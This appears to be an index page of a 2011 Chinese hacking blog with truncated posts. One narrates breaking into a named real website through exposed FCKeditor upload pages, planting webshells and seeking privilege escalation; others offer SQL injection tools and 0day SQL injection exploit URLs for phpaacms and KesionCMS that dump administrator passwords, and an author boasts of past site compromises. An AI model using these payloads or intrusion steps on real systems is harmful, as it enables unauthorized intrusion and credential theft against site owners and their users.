一次星外虚拟主机的提权

分类:安全 | 2011-08-1 | 撸过 3,401 次
0人扯谈

今天看到个大马多功能防asp木马查杀内部测试版(有后门)看了下.换客网

www.taoyuanbao.com

小小检测了下绝对没啥可利用的。直接旁注几分钟拿下了个shell貌似运气好,随便打开个旁站。

手工输入 fckeditor路径 …。存在…

FCKeditor/editor/filemanager/connectors/test.html

FCKeditor/editor/filemanager/connectors/uploadtest.html

直接上传一句话。aspx的站 … 直接上大马…看了下路径d:\freehost 星外的主机。

在土司找到星外提权“新思路”[......]

继续阅读

MYSQL 数据库专用查询系统

分类:工具 | 2011-08-1 | 撸过 1,212 次
4人扯谈

自动查询某数据库下 所有的表。里字段所有的包含关键字的内容 并输出

下载地址:点击下载MYSQL数据库查询系统

Facebook奖励黑客挖到一个漏洞500刀

分类:新闻 | 2011-08-1 | 撸过 844 次
0人扯谈

大牛们快去试试吧。500美金也不少了。多挖几个啊。俺是没那个份了。只有继续装B了。

行业中Firefox和Chrome浏览器等产品曾经启动过“漏洞奖励”机制,鼓励发现漏洞的

用户和安全研究人员发现并提交漏洞报告,官方会根据情况分别提供数百至数千美元不等金额的奖励。

近日,全球顶级社交网站Facebook高管在接受Cnet采访时表示,公司也会推出

类似的漏洞奖励机制,每名成功提交的获证实漏洞可奖励500美元,无上限封顶。

大家可通过Facebook官方响应中心提交漏洞报告,申请奖励。在安全人员妥善处

理完该漏洞后即可发布给公众查询。类似的做法在行业里屡见不鲜,微软就曾经准备25万美元[......]

继续阅读

Mssql和Mysql注入神器

分类:工具 | 2011-07-30 | 撸过 1,485 次
1人扯谈

两个SQL注入工具。跟其它注入工具也差不多吧,俺只是觉得这两个工具速度很快。

多国语言,喜欢的收藏吧。运行环境要.NET。上两张图:

MSSQ Lm4xmssql:

MYSQL m4xmysql:

SQL注入下载地址

114啦网址导航留言本注入

分类:安全 | 2011-07-30 | 撸过 1,012 次
0人扯谈

漏洞文件feedback/feedback.php

 
影响版本 <=1.5

 

$username = empty($_POST['username']) ? '' : strip_tags(iconv('UTF-8', 'GBK', $_POST['username'])); $email = (isset($_POST['email'])) ? strip_tags(iconv('UTF-8', 'GBK', $_POST['email'])) : ''; $content = (isset($_POST['content'])) ? tri[......]

继续阅读

phpaacms 4.0 Sql 注入0day漏洞及修复

分类:安全 | 2011-07-30 | 撸过 1,139 次
0人扯谈

phpaacms是一套免费开源的简洁文章管理系统cms.

漏洞文件:search.php //变量$_GET['id']过滤不严造成的注射

测试EXP:

https://www.webshell.cc/phpaacms/search.php?id=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20concat(0x7e,0x27,phpaacms_users.password,0x27,0x7e)%20FROM%20`phpaa`.phpaacms_users%20LIMIT%2[......]

继续阅读

科汛CMS 6.X-7.06最新注入0day

分类:安全 | 2011-07-30 | 撸过 1,273 次
0人扯谈

kesionCMS用的人非常多哦。经常也被暴洞。记得几年前藏着一个科汛的HTTP头注入

0day日了好多站,那时候多喜欢挂驴。搞了好多黄色图片站来挂。

这次暴的洞是T00LS的核心先发的。然后论坛一个社工牛给社了后研究出来的。

直接暴管理员帐号和密码的EXP:

https://www.webshell.cc/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C[......]

继续阅读

第 70 页,共 70 页« 最新...102030...6667686970